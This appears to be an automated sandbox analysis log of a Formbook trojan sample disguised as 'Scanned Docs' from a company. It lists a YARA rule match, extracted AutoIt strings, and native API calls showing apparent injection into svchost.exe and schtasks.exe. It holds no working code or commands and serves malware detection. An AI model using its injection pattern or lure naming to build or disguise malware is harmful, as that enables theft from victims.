            Source: 00000001.00000002.1951562901.0000000004990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exe, 00000000.00000000.1644507068.0000000000342000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_866695a4-6
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exe, 00000000.00000000.1644507068.0000000000342000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_c619db8c-0
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_420655de-c
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_8ce1c832-0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042B293 NtClose,1_2_0042B293
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72B60 NtClose,LdrInitializeThunk,1_2_03C72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03C72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C735C0 NtCreateMutant,LdrInitializeThunk,1_2_03C735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C74340 NtSetContextThread,1_2_03C74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C74650 NtSuspendThread,1_2_03C74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72BE0 NtQueryValueKey,1_2_03C72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72BF0 NtAllocateVirtualMemory,1_2_03C72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72B80 NtQueryInformationFile,1_2_03C72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72BA0 NtEnumerateValueKey,1_2_03C72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72AD0 NtReadFile,1_2_03C72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72AF0 NtWriteFile,1_2_03C72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72AB0 NtWaitForSingleObject,1_2_03C72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72FE0 NtCreateFile,1_2_03C72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72F90 NtProtectVirtualMemory,1_2_03C72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72FA0 NtQuerySection,1_2_03C72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72FB0 NtResumeThread,1_2_03C72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72F60 NtCreateProcessEx,1_2_03C72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72F30 NtCreateSection,1_2_03C72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72EE0 NtQueueApcThread,1_2_03C72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72E80 NtReadVirtualMemory,1_2_03C72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72EA0 NtAdjustPrivilegesToken,1_2_03C72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72E30 NtWriteVirtualMemory,1_2_03C72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72DD0 NtDelayExecution,1_2_03C72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72DB0 NtEnumerateKey,1_2_03C72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72D00 NtSetInformationFile,1_2_03C72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72D10 NtMapViewOfSection,1_2_03C72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72D30 NtUnmapViewOfSection,1_2_03C72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72CC0 NtQueryVirtualMemory,1_2_03C72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72CF0 NtOpenProcess,1_2_03C72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72CA0 NtQueryInformationToken,1_2_03C72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72C60 NtCreateKey,1_2_03C72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72C70 NtFreeVirtualMemory,1_2_03C72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72C00 NtQueryInformationProcess,1_2_03C72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C73090 NtSetValueKey,1_2_03C73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C73010 NtOpenDirectoryObject,1_2_03C73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C739B0 NtGetContextThread,1_2_03C739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C73D70 NtOpenThread,1_2_03C73D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C73D10 NtOpenProcessToken,1_2_03C73D10
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F4340 NtSetContextThread,LdrInitializeThunk,4_2_036F4340
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F4650 NtSuspendThread,LdrInitializeThunk,4_2_036F4650
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F2B60 NtClose,LdrInitializeThunk,4_2_036F2B60
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F2AF0 NtWriteFile,LdrInitializeThunk,4_2_036F2AF0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F2AD0 NtReadFile,LdrInitializeThunk,4_2_036F2AD0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F2F30 NtCreateSection,LdrInitializeThunk,4_2_036F2F30
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036F2FE0 NtCreateFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036F2FB0 NtResumeThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036F2EE0 NtQueueApcThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036F2D30 NtUnmapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036F2D10 NtMapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036F2DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036F2DD0 NtDelayExecution,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036F2C60 NtCreateKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036F2C70 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036F2CA0 NtQueryInformationToken,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036F35C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036F39B0 NtGetContextThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036F2BE0 NtQueryValueKey
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036F2BF0 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036F2BA0 NtEnumerateValueKey
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036F2B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036F2AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036F2F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036F2FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036F2F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036F2E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036F2EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036F2E80 NtReadVirtualMemory
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036F2D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036F2DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036F2C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036F2CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036F2CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036F3010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036F3090 NtSetValueKey
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036F3D70 NtOpenThread
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036F3D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_02B37B90 NtDeleteFile
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_02B37940 NtCreateFile
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_02B37C30 NtClose
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002ED5EB CreateFileW,DeviceIoControl,CloseHandle
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002E1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002EE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_0028BF40
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_00288060
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002F2046
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002E8298
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002BE4FF
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002B676B
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_00314873
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002ACAA0
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_0028CAF0
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_0029CC39
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002B6DD9
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_0029D064
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_0029B119
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002891C0
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002A1394
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002A1706
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002A781B
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_00287920
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_0029997D
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002A19B0
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002A7A4A
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002A1C77
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002A7CA7
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_0030BE44
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002B9EEE
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002A1F32
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_03203610
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004100E3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040109D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004010A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040E163
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402A49
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402A50
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004033E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040FEC3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0042D6E3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402EB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040FEBB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004167CE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004027D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004167D3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D003E6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CC02C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF81CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF41A2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D001AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CC8158
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C30100
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3C7C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C64750
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C5C6E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D00591
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CEE4F6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF2446
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE4420
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF6BD7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFAB40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D0A9A6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C56962
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6E8F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C268B8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C4A840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C42840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C32FC8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CBEFA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB4F40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C82F28
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C60F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE2F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFEEDB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C52E90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFCE93
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C40E59
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFEE26
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3ADE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C58DBF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C4AD00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDCD1F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C30CF2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE0CB5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C40C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C8739A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2D34C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF132D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C5D2F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C452A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C4B1B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C7516C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D0B16B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CEF0CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF70E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFF0E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFF7B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF16CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C85630
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D095C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDD5B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF7571
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C31460
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFF43F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB5BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C7DBF9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C5FB80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFFB76
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CEDAC6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDDAAC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C85AA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE1AA3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFFA49
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF7A46
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB3A6C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C49950
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C5B950
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CD5910
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C438E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CAD800
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C03FD2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C03FD5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C41F92
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFFFB1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFFF09
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C49EB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C5FDC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C43D40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF1D5A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF7D73
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFFCF2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB9C32
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | Code function: 3_2_03E9203E
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | Code function: 3_2_03E93FBE
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | Code function: 3_2_03E9A6A9
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | Code function: 3_2_03E9A6AE
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | Code function: 3_2_03EB15BE
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | Code function: 3_2_03E93D9E
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | Code function: 3_2_03E93D96
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_0377A352
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036CE3F0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_037803E6
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_03760274
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_037402C0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_03748158
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036B0100
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_0375A118
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_037781CC
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_037801AA
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_03752000
